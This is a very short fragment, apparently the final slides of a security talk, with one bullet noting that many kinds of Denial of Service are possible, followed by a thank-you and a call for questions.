■ Many kinds of Denial of Service are possible. 



THANKYOUM! 

Questions time 



